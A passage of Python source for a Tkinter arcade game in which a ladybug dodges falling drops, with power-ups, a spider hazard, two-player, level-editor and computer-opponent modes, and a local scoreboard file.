data.coconuts1.remove(coconut)\r\n if data.Invincible2 == False:\r\n #only when powerup isn't active\r\n for coconut in data.coconuts2:\r\n if coconut.y>=data.player2Y-data.r and \\\r\n coconut.y<=data.player2Y+data.r:\r\n if coconut.x>=data.player2X-data.r and \\\r\n coconut.x<=data.player2X+data.r:\r\n data.player2Y+=data.hitPenalty \r\n data.coconuts2.remove(coconut)\r\n\r\n\r\nclass PowerUps(Coconuts):\r\n def __init__(self,x,y):\r\n super().__init__(x, y)\r\n\r\n def draw(self, canvas, data):\r\n canvas.create_image(self.x, self.y, image=data.hourGlass)\r\n \r\ndef hitPause(data):\r\n # checks if hits hour-glass & pauses with flag\r\n for powerUp in data.powerUps:\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\":\r\n if powerUp.y>=data.cy-data.r and powerUp.y<=data.cy+data.r:\r\n if powerUp.x>=data.cx-data.r and powerUp.x<=data.cx+data.r:\r\n data.pauseDrops = True\r\n data.start = data.cy\r\n data.powerUps.remove(powerUp)\r\n elif data.mode == \"2Player\" or data.mode == \"AI\":\r\n if powerUp.y>=data.player1Y-data.r and \\\r\n powerUp.y<=data.player1Y+data.r:\r\n if powerUp.x>=data.player1X-data.r and \\\r\n powerUp.x<=data.player1X+data.r:\r\n data.pause1Drop = True\r\n data.start1 = data.player1Y\r\n data.powerUps.remove(powerUp)\r\n if powerUp.y>=data.player2Y-data.r and \\\r\n powerUp.y<=data.player2Y+data.r:\r\n if powerUp.x>=data.player2X-data.r and \\\r\n powerUp.x<=data.player2X+data.r:\r\n data.pause2Drop = True\r\n data.start2 = data.player2Y\r\n data.powerUps.remove(powerUp)\r\n \r\n\r\nclass Invincible(PowerUps):\r\n def __init__(self,x,y):\r\n super().__init__(x, y)\r\n \r\n def draw(self, canvas, data):\r\n canvas.create_image(self.x, self.y, image=data.umbrella)\r\n\r\ndef hitInvincible(data):\r\n #checks if hits umbrella powerup\r\n for powerUp in data.invincible:\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\":\r\n if powerUp.y>=data.cy-data.r and powerUp.y<=data.cy+data.r:\r\n if powerUp.x>=data.cx-data.r 
and powerUp.x<=data.cx+data.r:\r\n data.beInvincible = True\r\n data.start = data.cy\r\n data.invincible.remove(powerUp)\r\n if data.mode == \"2Player\" or data.mode == \"AI\":\r\n #for player1\r\n if powerUp.y>=data.player1Y-data.r and \\\r\n powerUp.y<=data.player1Y+data.r:\r\n if powerUp.x>=data.player1X-data.r and \\\r\n powerUp.x<=data.player1X+data.r:\r\n data.Invincible1=True\r\n data.start1 = data.player1Y\r\n data.invincible.remove(powerUp)\r\n # for player 2\r\n if powerUp.y>=data.player2Y-data.r and \\\r\n powerUp.y<=data.player2Y+data.r:\r\n if powerUp.x>=data.player2X-data.r and \\\r\n powerUp.x<=data.player2X+data.r:\r\n data.Invincible2=True\r\n data.start2 = data.player2Y\r\n data.invincible.remove(powerUp)\r\n \r\nclass ScaryBug(object):\r\n def __init__(self,x,y):\r\n self.x = x\r\n self.y = y\r\n self.speed = 25\r\n\r\n def draw(self, canvas, data):\r\n canvas.create_image(self.x, self.y, image=data.spider)\r\n\r\n def onTimerFired(self, data):\r\n if data.mode ==\"2Player\" or data.mode == \"AI\":\r\n self.speed = 35\r\n self.y -= self.speed\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\" and\\\r\n data.time %8 ==0:\r\n #makes spider dynamically move\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if self.x -data.lane >=data.Player1Min:self.x-=data.lane\r\n else: self.x+=data.lane\r\n elif side == \"r\":\r\n if self.x+data.lane<= data.Player1Max:self.x +=data.lane\r\n else: self.x -=data.lane\r\n \r\n \r\n \r\ndef hitScaryBug(data):\r\n # checks for automatic death by spider\r\n for bug in data.scaryBug:\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\":\r\n if bug.y>=data.cy-1.5*data.r and bug.y<=data.cy+1.5*data.r:\r\n if bug.x>=data.cx-1.5*data.r and bug.x<=data.cx+1.5*data.r:\r\n data.hit = True\r\n data.lives = 0\r\n data.levelEditorLives = 0\r\n if data.mode == \"2Player\" or data.mode == \"AI\":\r\n if bug.y>=data.player1Y-data.r and bug.y<=data.player1Y+data.r:\r\n if 
bug.x>=data.player1X-data.r and bug.x<=data.player1X+data.r:\r\n data.winner= \"player2\"\r\n if bug.y>=data.player2Y-data.r and bug.y<=data.player2Y+data.r:\r\n if bug.x>=data.player2X-data.r and bug.x<=data.player2X+data.r:\r\n data.winner= \"player1\"\r\n\r\ndef drawPowerups(canvas, data):\r\n for bug in data.scaryBug:\r\n bug.draw(canvas, data)\r\n for powerUp in data.powerUps:\r\n powerUp.draw(canvas, data)\r\n for powerUp in data.invincible:\r\n powerUp.draw(canvas, data)\r\n\r\ndef drawHome(canvas, data):\r\n #home button in every screen\r\n canvas.create_image(data.homeX,data.homeY, image= data.home)\r\n\r\ndef checkHome(event, data):\r\n if data.homeY-data.r<= event.y <= data.homeY +data.r:\r\n if data.homeX-data.r<= event.x<=data.homeX+ data.r:\r\n init(data)\r\n \r\ndef coconutShot(data):\r\n if data.level >0 and data.pauseDrops == False:\r\n if data.time%int(data.levelMax/data.level) == 0 or data.time%6==0:\r\n #increases drops as level increases\r\n xPosition1 = random.randint(0,data.Player1Min-data.buffer)\r\n xPosition2 = random.randint(data.Player1Max+data.buffer,\r\n data.width +data.buffer)\r\n data.coconuts.append(Coconuts(xPosition1,0))\r\n data.coconuts.append(Coconuts(xPosition2,0))\r\n xPosition4 = random.randint(data.Player1Min-data.buffer,\r\n data.Player1Max+data.buffer)\r\n data.coconuts.append(Coconuts(xPosition4,0))\r\n if data.time %5 ==0:\r\n xPosition3 = random.randint(0, data.Player1Min-data.buffer)\r\n data.coconuts.append(Coconuts(xPosition3,0))\r\n if data.time % int(24/data.level) ==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\": \r\n data.coconuts.append(Coconuts(data.Player1Min,0))\r\n elif side ==\"r\":\r\n data.coconuts.append(Coconuts(data.Player1Max,0))\r\n powerUpCoconutShot(data)\r\n \r\ndef powerUpCoconutShot(data):\r\n #adds powerUps\r\n #magic #s toallow for powerups to be added at different times\r\n if data.time % 60 == 0 and data.time%120 !=0:\r\n Position = random.choice(data.spotList)\r\n 
data.powerUps.append(PowerUps(Position,0))\r\n if data.time%50 == 0:\r\n Position = random.choice(data.spotList)\r\n data.invincible.append(Invincible(Position,0))\r\n if data.time %100==0:\r\n Position = random.choice(data.spotList)\r\n data.scaryBug.append(ScaryBug(Position,750))\r\n\r\ndef playerKeyPressed(event,data):\r\n if data.level<data.levelMax and event.keysym == \"r\": init(data)\r\n if (event.keysym == \"Left\") and data.cx>=data.Player1Min+(data.lane/2):\r\n data.cx -=(data.lane)/2\r\n elif(event.keysym == \"Right\") and data.cx<=data.Player1Max:\r\n data.cx +=(data.lane)/2\r\n if data.level >= data.levelMax:\r\n #enter name for scoreboard\r\n if len(event.keysym) ==1:\r\n if len(data.name) <15:\r\n data.name += event.keysym\r\n if event.keysym==\"BackSpace\":\r\n data.name = data.name[0:-1]\r\n if event.keysym == \"Return\":\r\n data.scoreList += ((data.score, data.name))\r\n #saves file\r\n writeFile(\"score.txt\",\r\n data.savedScores+str(data.score)+\",\"+data.name+\"\\n\")\r\n data.mode =\"scoreboard\"\r\n \r\n\r\ndef playerMousePressed(event, data): checkHome(event, data)\r\n\r\ndef playerTimerFired(data):\r\n #actually pauses, and moves drops/player\r\n if data.hit== False and data.level<data.levelMax:\r\n data.cy-=data.speed\r\n if data.time%5 ==0: data.score +=data.level\r\n if data.cy < 15: #basically made it to the top\r\n data.level +=1\r\n data.cy = data.Player1Max + 10\r\n data.speed +=2\r\n if data.cy>40: #so drops you can't see don't hit you\r\n data.time +=1\r\n if data.pauseDrops !=True: coconutShot(data)\r\n for powerUp in data.powerUps: powerUp.onTimerFired(data)\r\n hitPause(data)\r\n for powerUp in data.invincible: powerUp.onTimerFired(data)\r\n hitInvincible(data)\r\n for bug in data.scaryBug: bug.onTimerFired(data)\r\n hitScaryBug(data)\r\n for coconut in data.coconuts:\r\n # only want drops to move if not paused\r\n if data.pauseDrops == False: coconut.onTimerFired(data)\r\n if data.beInvincible == False:hit(data)\r\n if 
data.start != None:\r\n if abs(data.start-data.cy) >= 120:\r\n #to limit time for powerups to be active\r\n data.pauseDrops, data.beInvincible = False, False\r\n\r\ndef playerRedrawAll(canvas, data):\r\n # magic #s mainly for screen placement\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_line(0,20, data.width, 20)\r\n for coconut in data.coconuts: coconut.draw(canvas)\r\n drawPowerups(canvas, data)\r\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\r\n canvas.create_text(data.width/6,50, text =\"Level: %d\" %data.level,\r\n font = \"Arial 18 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/6,80, text =\"Score: %d\" %data.score,\r\n font = \"Arial 18 bold\", fill = \"yellow\")\r\n canvas.create_text(2*data.width/3,660,\r\n text =\"\"\"The greater the level, the more points get\r\n added to your score!\"\"\",\r\n font = \"Arial 15 bold\", fill = \"yellow\")\r\n if data.hit== True:\r\n canvas.create_rectangle(0,0,data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.deadScreen)\r\n canvas.create_text(data.width/2,data.height/4,\r\n text = \"You Lose! 
Better Luck Next Time!\",\r\n font = \"Helvetica 23 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2,280, text =\"Score: %d\" %data.score,\r\n font = \"Arial 13 bold\", fill = \"yellow\")\r\n if data.level >= 8: madeIt(canvas, data)\r\n drawHome(canvas, data)\r\n\r\ndef madeIt(canvas, data):# magic #s mainly for screen placement\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,70, text = \"You Made it!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2,100, text =\"Score: %d\" %data.score,\r\n font = \"Arial 15 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2,375, text =\"Congrats! Enter your Name!\",\r\n font = \"Arial 15 bold\", fill = \"yellow\")\r\n canvas.create_rectangle(data.width/2 - 50, 400, data.width/2+50, 450,\r\n fill = \"white\")\r\n canvas.create_text(data.width/2, 425, text = data.name)\r\n \r\n \r\n####################################\r\n# 2Player mode\r\n#################################### \r\ndef drop2Player(data):\r\n #adds drops when not paused\r\n #magic #s are position of where drops are starting\r\n if data.winner ==None and data.pauseDrops == False:\r\n if data.time%15==0:\r\n xPosition1 = random.randint(0,385)\r\n if abs(xPosition1 - 100)>25 and abs(xPosition1 - 360)>25:\r\n #so random drops don't interfere with the lane ones\r\n if data.pause1Drop != True:\r\n data.coconuts1.append(Coconuts(xPosition1,0))\r\n if data.pause2Drop != True:\r\n data.coconuts2.append(Coconuts(xPosition1 +410,0))\r\n if data.time % 12 ==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop != True:\r\n data.coconuts1.append(Coconuts(140,0))\r\n if data.pause2Drop != True:\r\n data.coconuts2.append(Coconuts(540,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop 
!=True:data.coconuts1.append(Coconuts(344,0))\r\n if data.pause2Drop!=True:data.coconuts2.append(Coconuts(755,0))\r\n powerupDrop2Player(data)\r\n\r\ndef powerupDrop2Player(data):\r\n #adds powerups on both screens (in the same position)\r\n if data.time % 45 == 0 and data.time%90 !=0:\r\n #randomize placement\r\n side = random.choice(data.sides)\r\n if side == \"l\":\r\n if data.pause1Drop!=True:data.powerUps.append(PowerUps(140,0))\r\n if data.pause2Drop!=True:data.powerUps.append(PowerUps(540,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop!=True:data.powerUps.append(PowerUps(344,0))\r\n if data.pause2Drop!=True:data.powerUps.append(PowerUps(755,0))\r\n if data.time%60 == 0:\r\n side = random.choice(data.sides)\r\n if side == \"l\": \r\n if data.pause1Drop!=True:data.invincible.append(Invincible(140,0))\r\n if data.pause2Drop!=True:data.invincible.append(Invincible(540,0))\r\n elif side ==\"r\":\r\n if data.pause1Drop!=True:data.invincible.append(Invincible(344,0))\r\n if data.pause2Drop!=True:data.invincible.append(Invincible(755,0))\r\n if data.time %90==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\": \r\n data.scaryBug.append(ScaryBug(140,750))\r\n data.scaryBug.append(ScaryBug(540,750))\r\n elif side ==\"r\":\r\n data.scaryBug.append(ScaryBug(344,750))\r\n data.scaryBug.append(ScaryBug(755,750))\r\n \r\ndef twoPlayerKeyPressed(event,data):\r\n # controllers for both bugs\r\n if event.keysym == \"r\": init(data)\r\n if data.winner==None:\r\n if (event.keysym == \"a\") and data.onLeft1==False:\r\n data.onLeft1 = True\r\n data.player1X = 150\r\n if(event.keysym == \"d\") and data.onLeft1== True:\r\n data.onLeft1 = False\r\n data.player1X = 330\r\n if (event.keysym == \"Left\") and data.onLeft2==False:\r\n data.onLeft2 = True\r\n data.player2X = 550\r\n if(event.keysym == \"Right\") and data.onLeft2 == True:\r\n data.onLeft2 = False\r\n data.player2X = 750\r\n\r\ndef twoPlayerMousePressed(event, data):\r\n checkHome(event, data)\r\n \r\ndef 
twoPlayerTimerFired(data):\r\n if data.winner == None:\r\n data.player1Y-=data.speed\r\n #<15 signifies that lady bug reached the top\r\n if data.player1Y < 15 and data.player2Y >15:\r\n data.winner= \"player1\"\r\n if data.player1Y>40:\r\n data.time +=1\r\n drop2Player(data)\r\n data.player2Y-=data.speed\r\n if data.player2Y < 15 and data.player1Y> 15:\r\n data.winner= \"player2\"\r\n if data.player2Y>40:\r\n data.time +=1\r\n drop2Player(data)\r\n if data.player1Y < 15 and data.player2Y <15:\r\n data.winner = \"tie\"\r\n for powerUp in data.powerUps: powerUp.onTimerFired(data)\r\n hitPause(data)\r\n for powerUp in data.invincible:powerUp.onTimerFired(data)\r\n hitInvincible(data)\r\n for bug in data.scaryBug:bug.onTimerFired(data)\r\n hitScaryBug(data)\r\n powerupTimerFired(data)\r\n\r\ndef powerupTimerFired(data):\r\n for coconut in data.coconuts1:\r\n if data.pause1Drop == False:\r\n coconut.onTimerFired(data)\r\n hit2Player(data)\r\n for coconut in data.coconuts2:\r\n if data.pause2Drop == False:\r\n coconut.onTimerFired(data) \r\n if data.start1 != None:\r\n # to make powerups only active for set amount of time\r\n if abs(data.start1-data.player1Y) >= 120:\r\n data.pause1Drop = False\r\n data.Invincible1 = False\r\n if data.start2 != None:\r\n if abs(data.start2-data.player2Y) >= 120:\r\n data.pause2Drop = False\r\n data.Invincible2 = False\r\n \r\n\r\ndef twoPlayerRedrawAll(canvas, data):\r\n #magic #s for placement on screen\r\n canvas.create_image(data.width/4, data.height/2, image=data.halfBackground)\r\n canvas.create_image(3*data.width/4, data.height/2,image=data.halfBackground)\r\n canvas.create_line(data.width/2, 0, data.width/2, data.height, width = 10)\r\n canvas.create_line(0,20, data.width, 20)\r\n for coconut in data.coconuts1: coconut.draw(canvas)\r\n for coconut in data.coconuts2: coconut.draw(canvas)\r\n drawPowerups(canvas, data)\r\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\r\n canvas.create_image(data.player2X, 
data.player2Y, image=data.ladyBug)\r\n canvas.create_text(50,40, text = \"Player 1\",font = \"Arial 15 bold\",\r\n fill = \"yellow\")\r\n canvas.create_text(450,40, text = \"Player 2\",font = \"Arial 15 bold\",\r\n fill = \"yellow\")\r\n winner(canvas, data)\r\n drawHome(canvas, data)\r\n\r\ndef winner(canvas, data):\r\n if data.winner== \"player1\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"You Made it! Player 1\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n elif data.winner== \"player2\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"You Made it! Player 2\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n elif data.winner== \"tie\":\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"Tie! 
You Both Made it!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n\r\n####################################\r\n# editor mode\r\n####################################\r\n\r\ndef editorKeyPressed(event,data):\r\n if event.keysym == \"r\": init(data)\r\n\r\ndef editorMousePressed(event, data):\r\n #check for click on button for your speed\r\n checkHome(event, data)\r\n if data.easyY-data.r<= event.y <= data.easyY +data.r:\r\n if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:\r\n data.yourSpeed = \"slow\"\r\n data.slow = data.click\r\n data.medium, data.fast = data.notClick, data.notClick\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.yourSpeed = \"medium\"\r\n data.medium = data.click\r\n data.slow, data.fast = data.notClick, data.notClick\r\n if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:\r\n data.yourSpeed = \"fast\"\r\n data.fast = data.click\r\n data.slow, data.medium = data.notClick, data.notClick\r\n checkMiddle(event, data)\r\n checkLast(event, data)\r\n\r\ndef checkMiddle(event, data):\r\n #check for click on button for rain speed\r\n if data.medX-data.r<= event.y <= data.medX + data.r:\r\n if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:\r\n data.rainSpeed = \"drizzle\"\r\n data.drizzle = data.click\r\n data.rain, data.thunderstorm = data.notClick, data.notClick\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.rainSpeed = \"rain\"\r\n data.rain = data.click\r\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\r\n if data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:\r\n data.rainSpeed = \"thunderstorm\"\r\n data.thunderstorm = data.click\r\n data.drizzle, data.rain = data.notClick, data.notClick\r\n\r\ndef checkLast(event, data):\r\n #check for click on button for powerups\r\n if data.last-data.r<=event.y<= data.last+data.r:\r\n if data.easyY-2*data.r<= event.x<=data.easyY+2*data.r:\r\n data.powerUpsEditor = True\r\n data.yes, data.no = data.click, data.notClick\r\n if 
data.last-2*data.r<= event.x<=data.last+2*data.r:\r\n data.powerUpsEditor = False\r\n data.no, data.yes = data.click, data.notClick\r\n if data.enter == data.click:\r\n if data.enterX-data.r<=event.y<=data.enterX+data.r:\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.mode=\"levelCreated\"\r\n \r\n \r\n\r\ndef drawButtons(canvas, data):\r\n #makes each button\r\n data.font, data.fill = \"Helvetica 13 bold\", \"yellow\"\r\n canvas.create_text(data.medX,data.YST, text= \"Your Speed:\",\r\n font = data.font,fill =data.fill)\r\n canvas.create_image(data.easyX,data.easyY, image = data.slow)\r\n canvas.create_text(data.easyX,data.easyY, text=\"Slow\", font = data.font)\r\n canvas.create_image(data.medX,data.easyY, image = data.medium)\r\n canvas.create_text(data.medX,data.easyY, text=\"Medium\", font = data.font)\r\n canvas.create_image(data.hardX,data.easyY, image = data.fast)\r\n canvas.create_text(data.hardX,data.easyY, text=\"Fast\",font = data.font)\r\n canvas.create_image(data.easyX,data.medX, image = data.drizzle)\r\n canvas.create_text(data.medX,data.RST, text= \"Rain Speed:\",\r\n font = data.font,fill =data.fill)\r\n canvas.create_text(data.easyX,data.medX, text=\"Drizzle\",font = data.font)\r\n canvas.create_image(data.medX,data.medX, image = data.rain)\r\n canvas.create_text(data.medX,data.medX, text=\"Rain\",font = data.font)\r\n canvas.create_image(data.hardX,data.medX, image = data.thunderstorm)\r\n canvas.create_text(data.hardX,data.medX, text=\"Heavy\",font = data.font)\r\n canvas.create_text(data.medX,data.PUT, text= \"PowerUps?\",\r\n font = data.font,fill =data.fill)\r\n canvas.create_image(data.easyY,data.last, image = data.yes)\r\n canvas.create_text(data.easyY,data.last, text=\"Yes\",font = data.font)\r\n canvas.create_image(data.last,data.last, image = data.no)\r\n canvas.create_text(data.last,data.last, text=\"No\",font = data.font)\r\n changeEnter(canvas, data)\r\n\r\ndef changeEnter(canvas, data):\r\n #makes it so the enter 
button respond to click\r\n if data.powerUpsEditor != None and data.yourSpeed != None and \\\r\n data.rainSpeed != None: data.enter = data.click\r\n canvas.create_image(data.medX,data.enterX, image = data.enter)\r\n canvas.create_text(data.medX,data.enterX, text=\"Enter\",font = data.font)\r\n\r\ndef editorTimerFired(data):\r\n data.editorTime += 1\r\n if data.editorTime %2 ==0:\r\n rainDrop(data)\r\n for drop in data.editorDrops:\r\n drop.onTimerFired(data)\r\n\r\ndef rainDrop(data):\r\n #background drops\r\n xPosition = random.randint(0,data.width)\r\n data.editorDrops.append(Coconuts(xPosition,0))\r\n\r\ndef editorRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_image(data.width/2, data.height/2, image=data.tbg)\r\n for drop in data.editorDrops:\r\n drop.draw(canvas)\r\n canvas.create_text(data.width/2, data.S_P -10, text = \"Edit Your Level!\",\r\n font=\"Arial 23 bold\", fill = \"yellow\")\r\n drawButtons(canvas, data)\r\n drawHome(canvas, data)\r\n####################################\r\n# levelCreated mode\r\n####################################\r\ndef setEverything(data):\r\n #customizing game\r\n if data.yourSpeed == \"slow\": data.speed = 6\r\n elif data.yourSpeed == \"medium\": data.speed = 10\r\n elif data.yourSpeed == \"fast\": data.speed = 14\r\n if data.rainSpeed == \"thunderstorm\": data.rSpeed = 7\r\n elif data.rainSpeed == \"rain\": data.rSpeed = 10\r\n elif data.rainSpeed == \"drizzle\": data.rSpeed = 13\r\n \r\n\r\ndef levelCoconutShot(data):\r\n #adding drops\r\n if data.levelEditorLives >0:\r\n if data.time%int(0.35*data.rSpeed) == 0:\r\n xPosition1 = random.randint(0,data.Player1Min-data.buffer)\r\n xPosition2 = random.randint(770, 870)\r\n xPosition3 = random.randint(220,770)\r\n data.coconuts.append(Coconuts(xPosition3,0))\r\n data.coconuts.append(Coconuts(xPosition1,0))\r\n data.coconuts.append(Coconuts(xPosition2,0))\r\n if data.time % int(0.55*data.rSpeed) ==0:\r\n 
xPosition3 = random.randint(0, 220)\r\n xPosition5 = random.randint(220,770)\r\n data.coconuts.append(Coconuts(xPosition3,0))\r\n data.coconuts.append(Coconuts(xPosition5,0))\r\n if data.time % int(data.rSpeed) ==0:\r\n side = random.choice(data.sides)\r\n if side == \"l\": \r\n data.coconuts.append(Coconuts(3*data.width/8-20,0))\r\n elif side ==\"r\":\r\n data.coconuts.append(Coconuts(7*data.width/8+40,0))\r\n xPosition4= random.randint(220,770)\r\n data.coconuts.append(Coconuts(xPosition4,0))\r\n \r\n levelPowerUp(data)\r\n\r\ndef levelPowerUp(data):\r\n # adding power-ups only if clicked yes\r\n if data.powerUpsEditor == True:\r\n if data.time % 20 == 0 and data.time%40 !=0:\r\n Position = random.choice(data.spotList)\r\n data.powerUps.append(PowerUps(Position,0))\r\n if data.time%30 == 0:\r\n Position = random.choice(data.spotList)\r\n data.invincible.append(Invincible(Position,0))\r\n if data.time %35==0:\r\n Position = random.choice(data.spotList)\r\n data.scaryBug.append(ScaryBug(Position,750))\r\n\r\ndef levelCreatedKeyPressed(event,data):\r\n if event.keysym == \"r\": init(data)\r\n if data.levelEditorLives>0:\r\n if (event.keysym == \"Left\") and data.cx>=317:\r\n data.cx -=(data.lane/2)\r\n elif(event.keysym == \"Right\") and data.cx<=740:\r\n data.cx +=(data.lane/2)\r\n\r\ndef levelCreatedMousePressed(event, data):\r\n checkHome(event, data)\r\n\r\ndef levelCreatedTimerFired(data):\r\n setEverything(data)\r\n if data.levelEditorLives>0:\r\n data.cy-=data.speed\r\n if data.cy < 15:\r\n data.level +=1\r\n if data.cy>40:\r\n data.time +=1\r\n if data.pauseDrops !=True: levelCoconutShot(data)\r\n if data.powerUpsEditor == False:\r\n for coconut in data.coconuts: coconut.onTimerFired(data)\r\n hit(data)\r\n if data.powerUpsEditor == True:\r\n for powerUp in data.powerUps: powerUp.onTimerFired(data)\r\n hitPause(data)\r\n for powerUp in data.invincible: powerUp.onTimerFired(data)\r\n hitInvincible(data)\r\n for bug in data.scaryBug: bug.onTimerFired(data)\r\n 
hitScaryBug(data)\r\n for coconut in data.coconuts:\r\n if data.pauseDrops == False:coconut.onTimerFired(data)\r\n if data.beInvincible == False: hit(data)\r\n if data.start != None:\r\n #to make powerups only active for set amount of time\r\n if abs(data.start-data.cy) >= 120:\r\n data.pauseDrops, data.beInvincible = False, False\r\n\r\n\r\ndef levelCreatedRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_line(0,20, data.width, 20)\r\n for coconut in data.coconuts: coconut.draw(canvas)\r\n if data.powerUpsEditor == True: drawPowerups(canvas, data)\r\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\r\n canvas.create_text(data.width/6,100,\r\n text =\"Total Lives: %d\" %data.levelEditorLives,\r\n font = \"Arial 20 bold\", fill = \"yellow\")\r\n canvas.create_text(data.width/2,660,\r\n text =\"\"\"You lose a life for hitting a drop\r\n & don't get eaten!\"\"\",\r\n font = \"Arial 15 bold\", fill = \"yellow\")\r\n if data.levelEditorLives <=0:\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.deadScreen)\r\n canvas.create_text(data.width/2,data.height/4,\r\n text = \"You Lose! 
Better Luck Next Time!\",\r\n font = \"Helvetica 23 bold\", fill = \"yellow\") \r\n if data.level > 1: winEditor(canvas, data)\r\n drawHome(canvas, data)\r\n\r\ndef winEditor(canvas, data):\r\n #screen for when you win\r\n canvas.create_rectangle(0,0, data.width, data.height, fill = \"black\")\r\n canvas.create_image(data.width/2, data.height/2, image=data.winScreen)\r\n canvas.create_image(300, 320, image=data.winBug)\r\n canvas.create_text(data.width/2,100, text = \"You Made it!\",\r\n font = \"Arial 23 bold\", fill = \"yellow\")\r\n\r\n####################################\r\n# AI Difficulty Mode\r\n####################################\r\ndef difficultyKeyPressed(event,data):\r\n if event.keysym == \"r\": init(data)\r\n\r\ndef drawDifficulties(canvas, data):\r\n canvas.create_text(data.medX,data.AITY, text= \"Computer Difficulty:\",\r\n font=\"Arial 23 bold\", fill = \"yellow\") \r\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\r\n canvas.create_text(data.easyX,data.easyY, text=\"Easy\")\r\n canvas.create_image(data.medX, data.easyY, image=data.medium)\r\n canvas.create_text(data.medX,data.easyY, text=\"Medium\")\r\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\r\n canvas.create_text(data.hardX,data.easyY, text=\"Hard\")\r\n if data.difficulty !=None:\r\n data.enter = data.click\r\n canvas.create_image(data.medX, data.enterY, image=data.enter)\r\n canvas.create_text(data.medX,data.enterY, text=\"Enter\")\r\n\r\ndef difficultyMousePressed(event, data):\r\n #sets up buttons to customize\r\n checkHome(event, data)\r\n if data.easyY-data.r<= event.y <= data.easyY +data.r:\r\n if data.easyX-2*data.r<= event.x<=data.easyX+2*data.r:\r\n data.difficulty = data.difS\r\n data.slow = data.click\r\n data.medium, data.fast = data.notClick, data.notClick\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.difficulty = data.difM\r\n data.medium = data.click\r\n data.slow, data.fast = data.notClick, data.notClick\r\n if 
data.hardX-2*data.r<= event.x<=data.hardX+2*data.r:\r\n data.difficulty = data.difH\r\n data.fast = data.click\r\n data.slow, data.medium = data.notClick, data.notClick\r\n if data.enter == data.click:\r\n if data.enterY-data.r<=event.y<=data.enterY+data.r:\r\n if data.medX-2*data.r<= event.x<=data.medX+2*data.r:\r\n data.mode=\"AI\"\r\n\r\ndef difficultyTimerFired(data):\r\n # makes normal background rain\r\n data.editorTime += 1\r\n if data.editorTime %2 ==0:\r\n rainDrop(data)\r\n for drop in data.editorDrops:\r\n drop.onTimerFired(data)\r\n\r\ndef rainDrop(data):\r\n xPosition = random.randint(0,data.width)\r\n data.editorDrops.append(Coconuts(xPosition,0))\r\n\r\ndef difficultyRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.height/2, image=data.background)\r\n canvas.create_image(data.width/2, data.height/2, image=data.tbg)\r\n for drop in data.editorDrops:\r\n drop.draw(canvas)\r\n drawDifficulties(canvas, data)\r\n drawHome(canvas, data)\r\n\r\n####################################\r\n# AI mode\r\n####################################\r\ndef hitAI1(data, distance):\r\n for coconut in data.coconutsAI1:\r\n # so AI switches by itself\r\n if (data.player1Y-data.r - coconut.y<=distance) and \\\r\n data.switchOnProgress == False:\r\n if coconut.x>=data.player1X-data.r and \\\r\n coconut.x<=data.player1X+data.r or AISwitchBug(data,distance)==True:\r\n testInt = random.randint(0,9)\r\n # to have different levels of difficulty\r\n if testInt<= data.difficulty:\r\n data.switchOnProgress= True\r\n if data.player1X == 150:\r\n data.player1X = 340\r\n else:\r\n data.player1X = 150\r\n data.switchOnProgress= False\r\n if coconut.y>=data.player1Y-data.r and coconut.y<=data.player1Y+data.r:\r\n if coconut.x>=data.player1X-data.r and \\\r\n coconut.x<=data.player1X+data.r:\r\n data.player1Y+=50\r\n data.coconutsAI1.remove(coconut)\r\n\r\ndef AISwitchBug(data, distance):\r\n #AI to move for spider\r\n for scaryBug in data.scaryBug:\r\n if 
